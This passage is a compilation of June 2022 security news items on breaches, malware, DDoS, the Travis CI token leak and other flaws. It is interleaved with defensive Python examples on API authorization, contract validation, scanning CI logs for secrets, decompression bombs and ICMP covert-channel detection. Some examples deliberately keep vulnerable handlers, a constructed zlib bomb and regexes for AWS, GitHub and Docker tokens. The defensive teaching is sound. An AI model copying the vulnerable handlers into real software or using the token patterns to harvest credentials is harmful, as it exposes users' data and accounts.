One of the early indicators of this was the redesign of its Security Update Guide in September 2020. At the time, the company removed a lot of verbose information about security bugs, replacing bug descriptions with a soup of numbers and generic terms that even some of today’s most experienced security researchers can barely understand and put into context.
At the time, Bob Huber, Chief Security Officer at Tenable, called it “a bad move, plain and simple.”
“With this new format, end users are completely blind to how a particular CVE impacts them. What’s more, this makes it nearly impossible to determine the urgency of a given patch. It’s difficult to understand the benefits to end-users,” Huber told this reporter in an email back in 2020.
“However, it’s not too difficult to see how this new format benefits bad actors. They’ll reverse engineer the patches and, by Microsoft not being explicit about vulnerability details, the advantage goes to attackers, not defenders. Without the proper context for these CVEs, it becomes increasingly difficult for defenders to prioritize their remediation efforts. Context is king and it’s extremely disappointing to see Microsoft remove that from this equation.”
But since then, more voices also started speaking up about their bad experiences when reporting vulnerabilities to Microsoft’s bug bounty program, with many issues either being ignored, downplayed, misunderstood, intentionally left without a patch, or not even classified as security issues—adding to a general trend where Microsoft appears to be trying its best to downplay any security issue reported to its security engineers.
Whatever is going on at the Microsoft Security Response Center, it appears that’s rubbing a lot of today’s top researchers the wrong way, but also creating a lot of frustration for those who have to deal with the company’s technology on a daily basis, especially from a security posture.
New Aadhaar leak
An Indian security researcher told TechCrunch that the website of PM-Kisan, an Indian government project aimed at providing Indian farmers with basic financial income, has leaked their Aadhaar numbers. The researcher said he found the issue in January, and it took the agency more than four months to fix it, with the website being patched in late May.
Firefox Total Cookie Protection
Mozilla has rolled out a new feature to Firefox users this week named Total Cookie Protection. The feature works by limiting access to cookies to the website where they were created, which has the side effect of preventing tracking companies from using the same cookies to track users browsing from across the web, from site to site. Mozilla described Total Cookie Protection as its “strongest privacy protection to date.”
Thunderbird comes to Android
The Thunderbird Foundation announced that the K-9 open-source Android email client has officially joined the Thunderbird project and will soon be rebranded and relaunched as Thunderbird for Android.
As of June 15, 2022, Microsoft has retired its Internet Explorer web browser from some versions of Windows 10. On affected versions, when users try to open IE or a URL, they will be redirected to Microsoft's newer Edge browser instead. IE did not ship with Microsoft's newest Windows 11 OS at all. More in Microsoft's IE retirement FAQ page.
Chrome’s Rust migration
In its quarterly security newsletter for Q1 2022, Google said that work has continued on moving some of the Chrome codebase from C++ to Rust, but the Chrome team does not know if they can ergonomically mix Rust with C++ in the Chromium code yet. In addition, the Chrome team said it is also continuing its efforts to put the browser’s networking service into its own sandbox process.
Avast said it detected new attacks in Brazil carried out by the GhostDNS threat actor. This group breaks into SOHO routers to modify DNS settings that resolve certain DNS queries to malicious sites.
Threat intel firm CloudSEK says it observed a "battle-tested" reverse-proxy, PHP-based phishing app called NakedPages being sold on a cybercrime forum. The threat actor claims the toolkit can be used to phish users of Google and Microsoft Office.
DownThem & AmpNode
The operator of the DownThem and the AmpNode DDoS-for-hire services was sentenced to two years in prison, according to the US DOJ. Investigators said that DownThem had more than 2,000 customers at the time of its owner’s arrest and had been used to launch more than 200,000 attacks. The owner, Matthew Gatrel, 33, of Illinois, ran the service with co-administrator Juan Martinez, 29, of Pasadena, who also pleaded guilty and was sentenced to five years of probation last year.
Hacktivist group DragonForce Malaysia announced last week a campaign of DDoS attacks against the Indian government and private sector entities as part of a new operation they’re calling OpsPatuk. DDoS mitigation provider Radware, which has been tracking the recent attacks, said the attacks are a direct result of a BJP politician attacking the Prophet Muhammad, comments that have outraged many Muslim communities last week.
Another record-breaking DDoS attack
Cloudflare said that it mitigated last week a 26 million request per second DDoS attack. According to the company, the attack is now the largest HTTPS DDoS attack on record, beating a previous 17.2M rps HTTPS DDoS attack recorded last year.
Avast has published a report on Syslogk, a new kernel rootkit found in the wild and targeting Linux systems. Researchers who analyzed the malware said Syslogk was based on Adore-Ng, a relatively old, open-source, well-known kernel rootkit for Linux, which initially targeted kernel 2.x but is currently updated to target kernel 3.x releases.
Cybersecurity firm Zscaler has published a report on PureCrypter, a malware loader strain that has been for sale on underground forums since March 2021. According to the company, the malware is written in .NET and has been observed distributing a variety of remote access trojans and information stealers.
Confiant is scheduled to release a report about a new tool advertised in cybercrime circles that can allow threat actors to create fake NFT minting pages that actually steal a victim’s NFT ownership and even Ethereum funds. We’ll update the web version of this newsletter once the report goes live, a few hours after the email version of this newsletter.
Palo Alto Networks said on Monday that it observed the GALLIUM APT group conduct new attacks expanding from its usual targeting of telecommunication operators to also go after financial institutions and government entities. Targeted entities were located in Afghanistan, Australia, Belgium, Cambodia, Malaysia, Mozambique, the Philippines, Russia, and Vietnam, and researchers said the group also debuted a new remote access trojan for these attacks, named PingPull.
Check Point has detailed a recent Iranian spear-phishing operation aimed against former Israeli officials, high-ranking military personnel, research fellows in research institutions, and think tanks. According to the company, some of the high-profile targets of this operation included:
- Tzipi Livni – former Foreign Minister and Deputy Prime Minister of Israel.
- A former Major General who served in a highly sensitive position in the Israeli Defense Forces (IDF).
- Chair of one of Israel’s leading security think tanks.
- A former US Ambassador to Israel.
- A former Chair of a well-known Middle East research center.
- A senior executive in the Israeli defense industry.
The Microsoft Patch Tuesday security updates for June 2022 are out. The OS maker fixed 61 security vulnerabilities this month, including an official patch for the Follina Office zero-day vulnerability that is currently under mass exploitation by both nation-state and cybercrime groups. An analysis of this month’s patches is available on the ZDI blog.
Other Patch Tuesday fixes
A team of academics from US universities has published a research paper on Tuesday detailing a new side-channel attack they have named Hertzbleed. This new attack targets Dynamic Frequency Scaling, a feature in modern x86 processors that allows CPUs to lower their frequency to consume less power if they aren’t used to their full extent. According to the research team, “Hertzbleed is a real, and practical, threat to the security of cryptographic software,” compared to many other previous side-channel attacks disclosed in the past. In their tests, the team said it was able to extract cryptographic keys from remote servers. All Intel CPUs are impacted, and a vast majority of AMD’s top processors, as well.
Orca Security has published in-depth technical details about a vulnerability known as SynLapse, a remote code execution flaw impacting the Azure Synapse Analytics and Azure Data Factory services. The vulnerability allowed attackers to hijack Azure Synapse workspaces, obtain Synapse customer account credentials, and bypass Azure tenant separation.
Google’s Project Zero team has published a root-cause analysis of a zero-day first abused in the wild in 2013. P0’s Maddie Stone discovered that the zero-day, initially patched in 2013, had its fix regressed in 2016 and was re-exploited again in 2022.
Microsoft buys Miburo
Microsoft announced this week plans to acquire cyber threat analysis and research company Miburo. The company is specialized in the detection of and response to foreign information operations.
Vulnerability: Credential leak in Travis CI log API
Team Nautilus at Aquasec has found an ongoing vulnerability affecting public instances of the Travis CI platform. The vulnerability exposes tens of thousands of user tokens (typically for GitHub, AWS, and DockerHub) in historical Travis CI logs that are accessible through an API. Similar issues have been reported in 2015 and 2019, and in this update we featured news of token leaks on Travis CI late last year.
Travis CI is a popular CI/CD platform that acts as a build orchestrator for software artifacts. As such, the platform requires access to various 3rd party platforms, such as source code repositories, container registries, and cloud platforms. Typically, the access credentials to these resources are stored as secrets in the CI/CD platform, only for internal use, and thus not accessible to the casual observer.
However, the researchers discovered that they could access historical logs of build jobs through a publicly accessible API. Using scripts to paginate through the log files, they determined that approximately 770 million logs were exposed. By examining the contents, they were able to identify secret values associated with various platforms.
The researchers did note that Travis CI provides some mitigation against mass leakage: the API endpoint is rate limited, in many cases the secret values are masked in the log files, and Travis CI recommends various techniques for masking secrets and deleting old log files.
Nonetheless, the sheer volume of logs available through the API endpoint pagination meant that tens of thousands of secrets may be accessible, representing a significant risk to assets on impacted 3rd party platforms. The researchers quoted Travis CI's response that the issue is "by design" — Travis CI has also previously been found wanting in its response to a similar leak. Users are urged to be cautious with credentials stored on Travis CI, including deleting log files, revoking and reissuing credentials, and narrowing down the roles in credentials to the bare minimum required to lessen the impact.
There are several important lessons to be learned here:
- Do not rely on security by obscurity — in this case, the platform stored old log files under an undisclosed endpoint but this could easily be reverse-engineered.
- Rate limiting is important, but it is only one element of an API defense strategy.
- Always have a plan for revoking and reissuing credentials, both in an emergency and as part of a security routine.
Article: Microsoft’s recommendations for mitigating against API threats
Microsoft has produced a high-quality set of recommendations for how to mitigate OWASP API security Top 10 threats with API management. Although primarily targeted at users of their Azure API tools (the balance of the recommendations focuses on using Azure platform features for secure configuration and monitoring), the recommendations are well-written and contain many excellent generic recommendations — I learned a lot here, and recommend bookmarking this as a checklist for hardening your APIs.
For me, some of the standout recommendations include:
- For API1:2019 — Broken object level authorization, the correct place for mitigation is through comprehensive authorization in the backend API code. Gateways can only offer limited defense, mainly by obscuring internal object identifiers.
- For API2:2019 — Broken authentication, leverage the power of the gateway to enforce uniform authentication across all endpoints by using standard methods, such as OAuth2 and JWT tokens.
- For API3:2019 — Excessive data exposure, again the best way to mitigate against this vulnerability is the judicious design of the data storage objects in the API backend code. Gateways can offer content validation but users should be aware of performance impacts with this method.
- For API4:2019 — Lack of resources and rate limiting, gateways can offer short-term and long-term rate limiting; use the OpenAPI definition to limit the amount of data that can be accessed by specifying length limits; use Cross-Origin Resource Sharing (CORS) but avoid wildcards; and revoke access for users who abuse resources.
- For API5:2019 — Broken function level authorization, the obvious recommendation is to require subscription keys for all endpoints by default and to avoid the use of wildcard endpoints.
- For API6:2019 — Mass assignment, the recommendations are similar to those for API3: manage the data transfer in the API backend code.
Thanks to Microsoft for the excellent set of recommendations.
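The two recommendations above that push mitigation into backend code (API1, broken object level authorization, and API6, mass assignment) in working form, as an added example that is not Microsoft's code or anything from its API Management guidance. The in-memory order store, the user names and the field names are hypothetical; the vulnerable handlers are kept beside the hardened ones so the difference is visible.

```python
"""Object-level authorization and field allow-listing in the API backend.

Added example, not Microsoft's code. Store, users and fields are hypothetical.
"""
from dataclasses import dataclass, field


class NotFound(Exception):
    """Returned for both 'no such id' and 'not your object' so an attacker
    cannot enumerate ids by telling 403 apart from 404."""


@dataclass
class Order:
    id: int
    owner: str
    items: list
    total: float
    status: str = "pending"
    discount: float = 0.0      # server-controlled, never client-writable


# Fields a client is allowed to set through the update endpoint.
CLIENT_WRITABLE = {"items"}


def make_store():
    """Fresh in-memory store so each scenario starts from the same state."""
    return {
        1001: Order(1001, "alice", ["widget"], 30.0),
        1002: Order(1002, "bob", ["gadget"], 55.0),
    }


def get_order_vulnerable(store, order_id, caller):
    """API1 (BOLA): looks up by id only. Any authenticated caller who guesses
    or increments an id reads someone else's order."""
    if order_id not in store:
        raise NotFound(order_id)
    return store[order_id]


def get_order(store, order_id, caller):
    """Hardened: the ownership check sits next to the data access, so every
    endpoint that goes through this function inherits it. A gateway cannot
    make this decision because it does not know who owns object 1002."""
    order = store.get(order_id)
    if order is None or order.owner != caller:
        raise NotFound(order_id)
    return order


def update_order_vulnerable(store, order_id, caller, payload):
    """API6 (mass assignment): copies every client-supplied key onto the model,
    so {"discount": 30.0} or {"owner": "mallory"} is honoured."""
    order = get_order(store, order_id, caller)
    for key, value in payload.items():
        setattr(order, key, value)
    return order


def update_order(store, order_id, caller, payload):
    """Hardened: only allow-listed fields are copied. Unknown fields are
    rejected rather than silently dropped, so a probing client gets a 400
    and the attempt is visible in logs."""
    order = get_order(store, order_id, caller)
    unknown = set(payload) - CLIENT_WRITABLE
    if unknown:
        raise ValueError(f"fields not writable by client: {sorted(unknown)}")
    for key in CLIENT_WRITABLE & set(payload):
        setattr(order, key, payload[key])
    return order


if __name__ == "__main__":
    store = make_store()
    print("vulnerable read:", get_order_vulnerable(store, 1002, "alice").owner)   # bob's order
    try:
        get_order(store, 1002, "alice")
    except NotFound:
        print("hardened read: not found")
    try:
        update_order(store, 1001, "alice", {"discount": 30.0})
    except ValueError as e:
        print("hardened update:", e)
```

The allow-list is deliberately a set of field names rather than a deny-list of dangerous ones: when a new server-controlled attribute is added to the model later, a deny-list silently starts accepting it.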
Article: Views on why API security needs special attention
The Economic Times featured a thought-provoking read on why API security needs special attention — as the author astutely states “Web applications security is not API security”.
The most interesting observation for me was the benefits (and challenges) of the design-first approach for API development. On the upside, the use of a design-first approach through OpenAPI definitions allows for the enforcement of a very precise contract between the API and the client — quite different from web applications where the boundaries are very blurred. This is the essence of the positive security model that uses the OpenAPI definition as the contract and only allows known good and blocks everything else. The author notes the major caveat with this approach: time pressures on developers mean that a design-first approach might not always be feasible so they begin by coding the API, thereby losing the benefits of contract enforcement.
The author highlights additional factors that impact APIs security:
- Lack of visibility into API inventory can inhibit security initiatives.
- Traditional security mechanisms (like rate limiting and network security) are useful but not entirely sufficient at thwarting threats to modern APIs.
- Due to time pressures on developers and testers, business logic flaws may be hard to detect.
Some great insight into the topic — leverage the power of your OpenAPI definitions.
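The positive security model the article describes, as an added example (not code from the article): a request validator that treats an OpenAPI-style contract as the only source of what is allowed, so an undeclared path, method, query parameter or body field is rejected instead of passed through. The contract and the requests are constructed; a production deployment would load the project's real OpenAPI document and use a full validator.

```python
"""Positive-security request validation against an OpenAPI-style contract.

Added example; not code from the article. Contract and requests are constructed.
"""

# Constructed subset of an OpenAPI definition for a hypothetical /orders resource.
CONTRACT = {
    "/orders": {
        "get": {
            "query": {
                "status": {"type": "string", "enum": ["pending", "shipped"]},
                "limit": {"type": "integer", "maximum": 100},
            },
            "body": None,
        },
        "post": {
            "query": {},
            "body": {
                "required": ["items"],
                "properties": {"items": {"type": "array"}, "note": {"type": "string"}},
            },
        },
    },
}

TYPES = {"string": str, "integer": int, "array": list}


def check_value(label, value, spec):
    """Type, enum and maximum checks for one parameter or field."""
    expected = TYPES[spec["type"]]
    # Query strings arrive as text; coerce digit strings before type checking.
    if expected is int and isinstance(value, str) and value.isdigit():
        value = int(value)
    if isinstance(value, bool) or not isinstance(value, expected):
        return [f"{label}: expected {spec['type']}"]
    if "enum" in spec and value not in spec["enum"]:
        return [f"{label}: not in enum"]
    if "maximum" in spec and value > spec["maximum"]:
        return [f"{label}: above maximum"]
    return []


def validate(contract, method, path, query, body):
    """Return a list of violations; an empty list means the request matches the
    contract. Anything the contract does not describe is a violation: the model
    allows known good and blocks everything else."""
    ops = contract.get(path)
    if ops is None:
        return [f"unknown path {path}"]
    op = ops.get(method.lower())
    if op is None:
        return [f"method {method} not allowed on {path}"]

    errors = []
    for name, value in query.items():
        spec = op["query"].get(name)
        if spec is None:
            errors.append(f"unexpected query parameter {name}")
            continue
        errors += check_value(f"query.{name}", value, spec)

    if op["body"] is None:
        if body is not None:
            errors.append("body not allowed")
        return errors

    body = body or {}
    for required in op["body"]["required"]:
        if required not in body:
            errors.append(f"missing required field {required}")
    for name, value in body.items():
        spec = op["body"]["properties"].get(name)
        if spec is None:
            errors.append(f"unexpected field {name}")
            continue
        errors += check_value(f"body.{name}", value, spec)
    return errors


if __name__ == "__main__":
    print(validate(CONTRACT, "GET", "/orders", {"status": "pending", "limit": "10"}, None))
    print(validate(CONTRACT, "POST", "/orders", {}, {"items": ["a"], "admin": True}))
```

The caveat from the article applies directly: this only protects endpoints that were designed first. An API that was coded before its definition was written, and then had a definition generated from the code, inherits whatever the code accepts, including the undeclared fields the validator is supposed to block.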
Travis CI API Exposes User Tokens
Researchers from Aqua’s Team Nautilus discovered that Travis CI API clear-text logs are available to anyone. The logs contain “tokens, secrets, and other credentials associated with popular cloud service providers such as GitHub, AWS, and Docker Hub.”
- It appears that in CI/CD, exposing credentials is a feature, not a bug. Automate rotating your credentials and assume they are lost if you are using the free version of Travis CI. This is likely to affect many open source projects using Travis CI to manage code deployment. This particular issue has existed in some form for years.
- This is described as the intended behavior for the Free Tier version of Travis CI. If you are going to continue to use the free tier version, the best mitigation, today, is to proactively rotate access tokens, minimizing the interval they are viable if discovered. Better still, investigate other options with a higher bar on protection of access tokens and related information, and properly fund key components such as your CI/CD tools.
Read more in
- Public Travis CI Logs (Still) Expose Users to Cyber Attacks
- Credentials for thousands of open source projects free for the taking—again!
- Travis CI API exposes thousands of user tokens that can let threat actors launch attacks
- Exposed Travis CI API Leaves All Free-Tier Users Open to Attack
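What a leaked credential in a build log actually looks like, and the masking that should have applied, for both Travis CI items above (the APIsecurity.io write-up and this one). This is an added example, not Aqua's scanner or Travis CI's own masking code. The log lines are constructed; the AWS values are the placeholder keys from AWS's own documentation, the GitHub token is a fake string that only matches the `ghp_` + 36-character format, and the `dckr_pat_` prefix is what Docker Hub personal access tokens use.

```python
"""Scan CI build logs for leaked credentials and mask them.

Added example; not Aqua's or Travis CI's code. Log lines are constructed and
every credential in them is a documented placeholder or a fake value.
"""
import re

# Each pattern is (kind, regex, group holding the secret value).
PATTERNS = [
    ("aws_access_key_id", re.compile(r"\bAKIA[0-9A-Z]{16}\b"), 0),
    ("github_pat", re.compile(r"\bghp_[A-Za-z0-9]{36}\b"), 0),
    ("dockerhub_pat", re.compile(r"\bdckr_pat_[A-Za-z0-9_-]+"), 0),
    # Generic VAR=value lines where the variable name says it is a secret.
    ("env_assignment",
     re.compile(r"\b([A-Z0-9_]*(?:SECRET|TOKEN|PASSWORD|PASS)[A-Z0-9_]*)=([^\s'\"]+)"), 2),
]

# Constructed build log; values are placeholders, not live credentials.
LOG = """\
$ export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
$ export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
$ git clone https://ghp_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghij@github.com/org/repo.git
$ docker login -u builder -p dckr_pat_example_not_real
$ npm install
added 412 packages in 9s
"""


def find_secrets(log_text):
    """Return (line_no, kind, value) for every suspected credential."""
    hits = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        for kind, regex, group in PATTERNS:
            for m in regex.finditer(line):
                label = kind if group == 0 else f"env:{m.group(1)}"
                hits.append((line_no, label, m.group(group)))
    return hits


def mask_log(log_text, placeholder="[secure]"):
    """Replace each detected value with a placeholder, the way CI providers
    mask declared secrets. Very short values are skipped so ordinary words
    are not blanked out by an over-broad pattern."""
    masked = log_text
    for _, _, value in find_secrets(log_text):
        if len(value) >= 8:
            masked = masked.replace(value, placeholder)
    return masked


if __name__ == "__main__":
    for line_no, kind, value in find_secrets(LOG):
        print(f"line {line_no}: {kind} -> {value[:6]}...")
    print(mask_log(LOG))
```

Two limits worth stating: masking only catches formats the scanner knows about (a bare hex API key for a less common service sails through), and the masked copy does not help with logs already fetched before masking was applied, which is why the advice on both items is to rotate the credentials rather than rely on the provider to hide them.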
PACMAN Hardware Attack Defeats Apple M1 Pointer Authentication
Researchers at MIT’s Computer Science & Artificial Intelligence Laboratory (CSAIL) have developed a new attack that defeats a security measure in Apple’s M1 CPU. Dubbed PACMAN, the hardware attack involves targeting the chip’s Pointer Authentication feature.
- This is a good example of needing to look at least two levels deep when thinking of vulnerabilities and risk. For this attack to succeed, among other things vulnerable software needs to be running on the processor. I can imagine the CPU test team running exhaustive tests when designing, sizing and testing the Pointer Authentication Code but not specifically trying enough combinations of unpatched/vulnerable OS and applications.
- The exploitability and significance of this vulnerability outside of a lab demo has been disputed in part due to the limitations imposed on collecting high resolution timing data. At this point, this isn’t anything you should spend time worrying about. Skip this story.
- This is essentially a proof of concept attack, and the Pac-Man write up is an interesting read. Expect Apple to continue to take steps to limit loading kernel modules to mitigate risks for this sort of attack.
Read more in
- The PACMAN Attack
- Researchers discover a new hardware vulnerability in the Apple M1 chip
- Design Weakness Discovered in Apple M1 Kernel Protections
- Apple M1 chip contains hardware vulnerability that bypasses memory defense
- New PACMAN hardware attack targets Macs with Apple M1 CPUs
Kaiser Permanente Breach Affects 70,000 Patients
Kaiser Permanente says that an employee's email account was compromised in early April, putting personal medical information of close to 70,000 patients at risk of exposure. The compromised data include names, medical record numbers, and lab test results. The US Department of Health and Human Services Office for Civil Rights is investigating the incident.
- Kaiser Permanente says its time-to-detect was a few hours, so the bigger question is why were medical records for 70,000 customers accessible in an employee’s email? The question is not why such sensitive data was in email – it almost always is, because quite often IT does not provide users with collaboration and analysis tools (or the users ignore them) and good old spreadsheets or .csv files are exchanged between users to meet immediate business needs. Not all that hard to detect (auditors find it all the time) but a regular process should be in place to detect PHI in user email queues.
- Email mailboxes are a treasure trove for attackers as people often use their mailbox as a database for storing all types of data, including passwords, personal data, and other highly sensitive material. However, most companies do not apply appropriate security to their email systems thinking of it as being only a communications channel. Companies should ensure users have MFA deployed for all email users, monitor for unusual login patterns, apply DLP for sensitive content, and where possible restrict access to sensitive mailboxes or mailboxes of high value targets from known and trusted locations.
- Kaiser has multiple regions with segmented data. This breach impacted Kaiser Foundation health plan of Washington. While we have been focused on security of patient facing devices in healthcare, don’t overlook back-end systems such as email which are also under attack and can also benefit from MFA and context driven access controls.
- The compromise of an employee’s e-mail account should not be sufficient to compromise PPI. One notes that, again for reasons of convenience, strong authentication is rarely required on e-mail. E-mail, along with browsing, messaging, and social media, is a major source of credential compromise and must be effectively controlled (strong authentication) and isolated from mission critical applications.
Read more in
- Kaiser Permanente Breach Exposes Data on 70K Patients
- Kaiser Permanente data breach exposes health data of 69K people
The World Economic Forum’s Atlas Initiative Aims to Map Cybercrime Ecosystem
The World Economic Forum Atlas Initiative is a collaborative research project with the goal of mapping the cybercrime ecosystem. The project will trace relationships between criminal groups and their infrastructure. Derek Manky, chief security strategist at FortiGuard Labs, which is one of the participating organizations, said, “We’re looking at the non-traditional artifacts. Think: crypto addresses and bank accounts, phone numbers, emails, things that ultimately help to build the challenge of attribution, which we always say is the holy grail.”
- Hopefully this interesting initiative will provide additional information and data on how we can tackle criminal gangs not just at the technical level but perhaps in other ways, such as financial measures and sanctions.
Ransomware Attacks Targeting Costa Rica are Among First Targeting a Country’s Government
The ransomware attacks that have plagued Costa Rica since April are unusual in that the group responsible for the attacks has openly called for the overthrow of the country's government. Costa Rica has declared a national emergency due to the attacks. The first attack, which began in April, targeted systems of government ministries. The second attack began on May 31 and targeted the Costa Rican Social Security Fund (CCSS), which oversees most of the country's public healthcare system.
- Think about having all your locations and affiliates under attack. Then consider how you would respond, contain, eradicate and prevent recurrence. Do you have the plan and supporting relationships, practice and training? How about your suppliers? Don’t forget to verify your NDAs cover these use cases.
Envoy Proxy DoS Vulnerability
Researchers from JFrog Security discovered a denial-of-service (DoS) vulnerability in Envoy Proxy. The flaw exists because “the code that is in charge of decompressing the user supplied data does not implement a size limit for the output buffer.” The vulnerability could be exploited to crash the proxy server; it has been fixed in Envoy versions 1.19.5, 1.20.4, 1.21.3 and 1.22.1. If upgrading is not possible, JFrog recommends that organizations ensure their configuration does not allow Brotli decompression.
- You need to update to the new firmware. Also, if you're enabling decompression of Brotli or GZip files, change the Brotli decompressor for GZip. Better still, disable that decompression.
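The defect class behind the advisory, a decompressor whose output size is dictated entirely by the sender, shown beside the bounded form, as an added example. This is not Envoy's code: it uses zlib from the Python standard library because Brotli is not in the standard library, but the fix (stream the output and stop at a budget) is the same whichever codec is in use. The highly compressible "bomb" payload is constructed in the block.

```python
"""Unbounded versus bounded decompression of a client-supplied body.

Added example; not Envoy's code. Uses zlib rather than Brotli. Payload is constructed.
"""
import zlib

# Constructed bomb: 4 MiB of zeros compress to a few KiB of DEFLATE data.
BOMB = zlib.compress(b"\0" * (4 * 1024 * 1024), 9)
MAX_OUTPUT = 256 * 1024        # decoded-body budget for this example, an assumption


class DecompressionLimitExceeded(Exception):
    pass


def decompress_unbounded(data):
    """Vulnerable shape: the output buffer grows to whatever the stream expands to,
    so a few KiB on the wire can pin megabytes, or gigabytes, of proxy memory."""
    return zlib.decompress(data)


def decompress_bounded(data, max_output=MAX_OUTPUT, chunk=64 * 1024):
    """Hardened: decode in chunks of at most `chunk` bytes and abort as soon as
    the running total passes `max_output`, so peak memory is bounded by roughly
    max_output + chunk regardless of what the sender supplied."""
    decoder = zlib.decompressobj()
    out = bytearray()
    unconsumed = data
    while not decoder.eof:
        piece = decoder.decompress(unconsumed, chunk)   # at most `chunk` bytes out
        out += piece
        if len(out) > max_output:
            raise DecompressionLimitExceeded(f"decoded body exceeds {max_output} bytes")
        unconsumed = decoder.unconsumed_tail
        if not unconsumed and not piece:
            raise ValueError("truncated or corrupt stream")
    return bytes(out)


if __name__ == "__main__":
    print("compressed size:", len(BOMB))
    print("unbounded decoded size:", len(decompress_unbounded(BOMB)))
    try:
        decompress_bounded(BOMB)
    except DecompressionLimitExceeded as e:
        print("bounded:", e)
```

The ratio matters more than the absolute numbers: the budget should be set from the largest legitimate request body the service expects, and the check has to run on the decoded size, since a limit on the compressed request body (the usual `max_request_bytes` style setting) does nothing against a stream that expands a thousandfold.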
Read more in
- Denial of Service Vulnerability in Envoy Proxy – CVE-2022-29225
- Patches issued for denial-of-service vulnerability found in cloud-native Envoy proxy
- DoS Vulnerability Allows Easy Envoy Proxy Crashes
Google Fixes Seven Vulnerabilities in Chrome for Desktop
Google has updated the stable channel for Chrome Desktop to version 102.0.5005.115 for Windows, Mac and Linux. The newest version of the browser includes fixes for seven security issues; four are rated high severity: a use-after-free vulnerability in WebGPU; an out-of-bounds memory access vulnerability in WebGL; an out-of-bounds read vulnerability in Chrome’s compositing component; and a use-after-free vulnerability in ANGLE.
- Don’t expect browser updates to settle into a patch Tuesday rhythm anytime soon. With the attention to finding and exploiting browser vulnerabilities, make sure you can readily and actively keep your browsers updated, including a defined process where the relaunch, required to activate the new version, is enforced. Be certain you’re actively tracking not just Chrome, but chromium-based browsers as well. Don’t ignore your other browsers, they are also being researched for vulnerabilities.
Read more in
- Stable Channel Update for Desktop
- Time to update: Google patches seven Chrome browser bugs, four rated ‘high’ risk
Gallium Hacking Group’s New Remote Access Trojan is Hard to Detect
Researchers from Palo Alto Networks’ Unit 42 have found that a known state-sponsored Chinese hacking group is now using a new remote access trojan (RAT). The RAT, dubbed “PingPull,” uses the Internet Control Message Protocol (ICMP) to hide communications with its command-and-control infrastructure. While this is not a new approach, many organizations still do not monitor ICMP traffic. The Gallium hacking group is known for targeting telecommunications companies, financial institutions, and government organizations.
Read more in
- GALLIUM Expands Targeting Across Telecommunications, Government and Finance Sectors With New PingPull Tool
- Researchers ID new RAT developed by Chinese hacking group with growing target list
- Chinese-linked APT adds governments, financial companies to target list
- Gallium hackers backdoor finance, govt orgs using new PingPull malware
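The point that ICMP is rarely monitored deserves a concrete detection, so here is one as an added example: a heuristic pass over ICMP echo-request records that groups traffic by source and destination and flags pairs whose payloads do not look like a stock `ping`. This is not Unit 42's code and it encodes no PingPull-specific signature; the packet records are constructed, the "standard ping" templates (the Windows alphabet payload and the Linux 8-byte timestamp plus incrementing bytes) and the thresholds are assumptions to be tuned against a baseline of your own network.

```python
"""Heuristic detection of ICMP echo traffic that looks like a command channel.

Added example; not Unit 42's code and not a PingPull signature. Records,
templates and thresholds are constructed assumptions.
"""
import math
import random
import struct
from collections import defaultdict

WINDOWS_TEMPLATE = b"abcdefghijklmnopqrstuvwabcdefghi"   # 32-byte Windows ping payload
LINUX_PATTERN = bytes(range(0x10, 0x40))                # assumed iputils pattern after 8-byte timestamp


def shannon_entropy(data):
    """Bits per byte; opaque command/exfil payloads sit far above text or patterns."""
    if not data:
        return 0.0
    counts = defaultdict(int)
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def is_standard_ping_payload(payload):
    return payload == WINDOWS_TEMPLATE or (len(payload) == 56 and payload[8:] == LINUX_PATTERN)


def analyse(records, min_packets=10, entropy_threshold=5.5, size_threshold=3):
    """records: iterable of (timestamp, src, dst, payload) for ICMP echo requests.
    Returns one finding per (src, dst) pair whose payloads look like a covert channel."""
    pairs = defaultdict(list)
    for _ts, src, dst, payload in records:
        pairs[(src, dst)].append(payload)

    findings = []
    for pair, payloads in pairs.items():
        if len(payloads) < min_packets:          # ignore one-off diagnostics
            continue
        odd = [p for p in payloads if not is_standard_ping_payload(p)]
        ratio = len(odd) / len(payloads)
        if ratio <= 0.5:
            continue
        reasons = []
        sizes = {len(p) for p in odd}
        if len(sizes) > size_threshold:          # real pings use one fixed size
            reasons.append("variable payload sizes")
        mean_entropy = sum(shannon_entropy(p) for p in odd) / len(odd)
        if mean_entropy > entropy_threshold:
            reasons.append("high payload entropy")
        if reasons:
            findings.append({"pair": pair, "packets": len(payloads), "nonstandard_ratio": ratio,
                             "distinct_sizes": len(sizes), "mean_entropy": round(mean_entropy, 2),
                             "reasons": reasons})
    return findings


def constructed_records():
    """Constructed sample: five benign Linux pings and thirty beacons to a
    TEST-NET address carrying opaque, variable-length payloads."""
    rng = random.Random(7)
    recs = []
    for i in range(5):
        timeval = struct.pack("!II", 1655000000 + i, 0)
        recs.append((i * 1.0, "10.0.0.5", "10.0.0.1", timeval + LINUX_PATTERN))
    for i in range(30):
        size = rng.randint(120, 400)
        payload = bytes(rng.getrandbits(8) for _ in range(size))
        recs.append((i * 2.0, "10.0.0.23", "203.0.113.10", payload))
    return recs


if __name__ == "__main__":
    for finding in analyse(constructed_records()):
        print(finding)
```

Entropy and size variance are cheap to compute from a packet capture or from sensors that retain ICMP payloads, but they are not on by default in most flow collectors, which is exactly why this channel keeps working. A hard rule is simpler still where the business allows it: egress ICMP to the internet from workstations and servers is rarely needed and can be dropped or alerted on at the perimeter.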
Recently unsealed court documents revealed that authorities compelled two travel companies – US-based Sabre and UK-based Travelport – to provide information regarding the movements of a Russian individual who was the subject of a hacking investigation. The target of the surveillance, Aleksei Burkov, was arrested in Israel in 2015 and extradited to the US in 2019.
- Another case of using the All Writs Act (which is very broad) to compel companies to release information relevant to an investigation. You may recall this was also used against Apple in the 2015 San Bernardino shooting case where the FBI wanted them to unlock the suspect’s phone. The trick is to make sure requests like this are not only specific to the active case, but also represent responses those served can actually provide.
- Any data collected is accessible via a court order. Most privacy policies and related legislation have specific exemptions built in to allow this. Not sure why anybody is surprised that this is happening.
- This action involved the courts, was narrowly crafted, and was disclosed on a timely basis. However, it involved the use of the ancient “All Writs Act” which the ACLU has found troubling and which has not been recently tested by appeals.
Read more in
Goodbye, IE (Mostly)
Microsoft will stop supporting most versions of Internet Explorer (IE) as of Wednesday, June 15. The browser was launched in August 1995. The IE desktop application will be disabled. Users are encouraged to move to Microsoft Edge with IE mode, which will be supported through at least 2029.
